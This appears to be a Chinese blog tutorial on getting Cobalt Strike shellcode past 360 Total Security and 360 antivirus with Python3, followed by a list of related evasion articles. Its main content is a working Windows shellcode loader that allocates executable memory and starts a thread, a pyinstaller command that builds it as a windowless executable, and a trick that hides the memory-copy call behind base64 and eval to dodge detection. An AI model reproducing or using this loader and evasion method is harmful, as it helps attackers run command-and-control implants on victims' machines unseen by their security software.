Python3 Cobalt strike shellcode 免杀过 360 卫士和360杀毒
Python2.7 现在很多杀毒软件都会查杀 免杀效果有点差。可以使用 python3 来做 shellcode 的免杀处理。
Python3 下载 下载最新的版本 当前实验的版本是 Python 3.8.6 64 位 pyinstaller 4.0 https://www.python.org/downloads/ pip install pyinstaller
Python3 shellcode 加载代码 import ctypes
#shellcode 加载
def shellCodeLoad(shellcode): ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(sh ellcode))) handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64( ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1)) if __name__ == "__main__": shellCodeLoad(bytearray(b'shellcode'))
编译 pyinstaller -F test.py --noconsole
有时候杀毒软件会查杀这一段代码
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(sh ellcode)))
可以使用编码进行处理 再 eval 动态执行代码
eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTW Vtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVu
KHNoZWxsY29kZSkpKQ=="))
Python3 shellcode 加载代码 import ctypes import base64
#shellcode 加载
def shellCodeLoad(shellcode): ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTW Vtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVu KHNoZWxsY29kZSkpKQ==")) handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64( ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1)) if __name__ == "__main__": shellCodeLoad(bytearray(b'shellcode'))
Python3 Cobalt strike shellcode 免杀过 360 卫士和360杀毒相关推荐
- cobalt strike木马免杀
0x001-针对powershell免杀 工具:Invoke-Obfuscation 操作实例: 1.利用CS生成powershell木马 2.进入invoke-Obsfuscation文件,使用po ...
- Cobalt Strike Veil 免杀过杀软(子篇10)
1.Veil的使用 Veil主要用于免杀payload 安装过程 https://www.veil-framework.com/ https://github.com/Veil-Framework/V ...
- 如何利用360卫士、腾讯管家屏蔽、拦截电脑上常见恶意弹窗广告的骚扰
相信我们在使用电脑的时候经常会遇到电脑桌面经常弹出资讯窗口,新闻窗口等等,比如说看视频的视频会出现弹窗,打开网页的时候也会出来弹窗广告,甚至桌面静止不动时也会弹出一些乱七八糟的广告,引起很多尴尬的场面 ...
- 【Windows】Shellcode免杀,过360、火绒、Defender 静态及主防
Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务 弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代码,也可以被认为是一段S ...
- Shellcode免杀,过360、火绒、windows-Defender
shellcode简介 Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务 弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代 ...
- Shellcode免杀,绕过360安全卫士、火绒安全、腾讯管家
前言 分享一个傻瓜式直接套用大佬的框架进行shellcode免杀,自己还是萌新还需要学习很多东西,大佬们不喜勿喷 杀毒原理 360.腾讯电脑管家.火绒剑.金山毒霸.瑞星等等,这几个杀毒软件领头羊,现在 ...
- 远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70)
0x00 免杀能力一览表 几点说明: 1.表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/mete ...
- python加载shellcode免杀 简介
目录 前言 0X00 基础概念 1. python ctypes模块介绍 2. dll动态链接库 3. pyinstaller 4. shellcode 5.关于windows defender 6 ...
- MSF外网渗透+shellcode免杀
1. 内网穿透 使用的Sunny-Ngrok服务 .你在Sunny-Ngrok官网注册好后获得一条免费或付费的隧道,添加tcp通道,端口号自定. 官网链接:https://www.ngrok.cc/( ...
- Python shellcode免杀
浅谈Python shellcode免杀 一.前言 在安全厂商日趋成熟的背景下,编写免杀马的难度和成本日益增长.很多师傅好用的开源免杀项目公布出来的同时几乎也就意味它的失效,对于一些和我一样对系统底 ...
最新文章
- Shell之awk常用用法
- 安装mysql查看随机密码命令_linux安装mysql-8.0.21-1.el7.x86_64.rpm-bundle - 君主-bye
- 等差区间 线段树+GCD
- 40幅五彩缤纷的秋天风景摄影作品欣赏(上篇)
- 自动选择SVG和VML的WEB页面
- 金融综合(网课+读书笔记)
- 2021 ICPC Asia Jinan Regional Contest-J Determinant(取模高斯消元)
- python2.7没有pip_python2.7无法使用pip怎么办
- android购物车计数器,Axure教程:计数器的实战应用场景 —— 商品购件数
- idea全局主题_IntelliJ IDEA好看的主题设置(支持自定义)
- java计算机毕业设计基于安卓Android的团务智慧管理APP(源码+系统+mysql数据库+Lw文档)
- 带你揭秘网络工程师群体!
- python求圆锥体的表面积公式_圆锥表面积公式推导-圆锥表面积的计算公式
- 智能窗帘传感器c语言程序,基于单片机的智能窗帘控制系统设计(附程序代码)
- 量化交易 米筐 获取股票列表与历史合约数据
- 深入浅出RISC-V调试
- SpringBoot WEB怎么实现大文件上传
- 灵魂拷问:Java的可变参数究竟是怎么一回事?
- 关于微信微博等二维码问题
- 递推递归练习 B - 王小二切饼